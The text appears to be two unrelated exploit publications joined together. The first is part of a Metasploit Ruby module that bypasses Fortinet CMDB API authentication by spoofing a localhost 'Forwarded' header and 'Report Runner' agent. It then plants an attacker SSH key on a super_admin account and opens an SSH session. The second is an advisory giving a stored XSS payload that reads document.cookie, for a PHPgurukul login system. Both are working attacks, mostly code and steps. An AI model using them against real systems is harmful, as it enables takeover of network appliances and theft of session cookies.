'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
]
)
end
def username
if datastore['USERNAME']
@username ||= datastore['USERNAME']
else
@username ||= detect_username
end
end
def ssh_rport
datastore['SSH_RPORT']
end
def current_keys
@current_keys ||= read_keys
end
def ssh_keygen
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
if datastore['PRIVATE_KEY']
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
File.read(datastore['PRIVATE_KEY']),
datastore['KEY_PASS'],
datastore['PRIVATE_KEY']
)
else
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
end
end
def ssh_private_key
ssh_keygen.to_pem
end
def ssh_pubkey
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
end
def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
end
def fortinet_request(params = {})
send_request_cgi(
{
'ctype' => 'application/json',
'agent' => 'Report Runner',
'headers' => {
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
}
}.merge(params)
)
end
def check
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
# a normal request to the API should return a 401
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
'ctype' => 'application/json'
})
return CheckCode::Unknown('Target did not respond to check.') unless res
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401
# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/status')
})
return CheckCode::Safe unless res&.code == 200
version = res.get_json_document['version']
print_good("Target is running the version #{version}, which is vulnerable.")
Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }
CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
end
def cleanup
return unless ssh_socket
# it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method
data = {
"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
}
fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
end
def detect_username
vprint_status('User auto-detection...')
res = fortinet_request(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin')
)
users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
# we prefer to use admin, but if it doesn't exist we chose a random one.
if datastore['PREFER_ADMIN']
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
users.include?('admin') ? 'admin' : users.sample
else
vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
(users - ['admin']).sample
end
end
def add_ssh_key
if current_keys.include?(authorized_keys)
# then we'll remove that on cleanup
print_good('Your key is already in the authorized_keys file')
return
end
vprint_status('Adding SSH key to authorized_keys file')
# Adding the SSH key as the last entry in the authorized_keys file
keystoadd = current_keys.first(2) + [authorized_keys]
data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h
res = fortinet_request({
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
'data' => data.to_json
})
fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500
body = res.get_json_document
fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
end
def read_keys
vprint_status('Reading SSH key from authorized_keys file')
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
})
fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200
result = res.get_json_document['results'].first
['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
result[key].gsub('"', '') unless result[key].empty?
end.compact
end
def do_login(ssh_options)
# ensure we don't have a stale socket hanging around
ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end
def exploit
print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
add_ssh_key
vprint_status('Establishing SSH connection')
ssh_options = ssh_client_defaults.merge({
auth_methods: ['publickey'],
key_data: [ ssh_private_key ],
port: ssh_rport
})
ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
do_login(ssh_options)
handler(ssh_socket)
end
end
# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 19/08/2023
# Exploit Author: Ashutosh Singh Umath
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 3.0
# Tested on: Windows 11
# CVE : Requested
Description
User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
POC
User side
1. Go to the user registration page http://localhost/loginsystem.
2. Enter <img src="x" onerror=alert(document.cookie)> in one of the
fields (first name, last name, email, or contact).
3. Click sign up.
Admin side
1. Login to admin panel http://localhost/loginsystem/admin.
2. After login successfully go to manage user page.
3. Payload
Thanks and Regards,
Ashutosh Singh Umath